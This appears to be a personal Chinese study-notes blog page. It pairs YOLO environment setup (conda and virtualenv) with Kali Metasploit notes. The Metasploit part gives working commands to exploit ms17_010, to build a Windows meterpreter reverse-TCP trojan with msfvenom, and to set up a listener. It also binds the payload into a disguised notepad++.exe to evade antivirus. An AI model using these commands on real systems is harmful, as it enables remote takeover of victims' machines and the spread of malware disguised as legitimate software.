Ting

Ting

满怀希望就会所向披靡

YOLO系列环境配置心路

创建虚拟环境

法一:conda

  • 创建
1
conda create -n your_env_name python=3.7
  • 激活Linux
1
conda activate your_env_name
1
source activate your_env_name

法二:virturalenvs

  • 创建
    直接用pycharm创建的环境就在这个.virturalenvs文件里面
  • 激活(找bin下的activate)
1
source /home/lzh/.virtualenvs/t_yolov7Oral/bin/activate

配置package

一般项目会有requirements.txt
进项目文件

Kali之metasploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
//启动
sudo su
mfsconsole

//搜索模块(以ms17_010为例
search ms17_010 

//查看模块选项并使用模块
show option
set [NAME] [内容]
//必设置项:RHOSTS
//必设置项:payload【攻击载荷,攻击完要做什么】

//运行
run

//进入meterpreter可以用help尝试命令

Msfvenom生成远控木马

1
2
3
4
5
//mfsvenom 用来生成后面软件,在目标机执行后面,本地监听
//mfsvenom shell里面使用

//放木马
msfvenom -ppayload windows/x64/meterpreter/reverse_tcppayload_name:系统/构架/作用/方式】 lhost=192.168.123.136 lport=9999payload设置  -fformat格式 exeWindows内可执行文件 -ooutput demo.exe
1
2
3
4
5
6
//远控木马放进去后监听
use exploit/multi/handler
set payload  windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run
1
2
3
4
//免杀木马
	//捆绑木马【原始】
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x【模板】 notepad++.exe -o notepad++.exe
    //加壳:压缩壳,加密壳
0%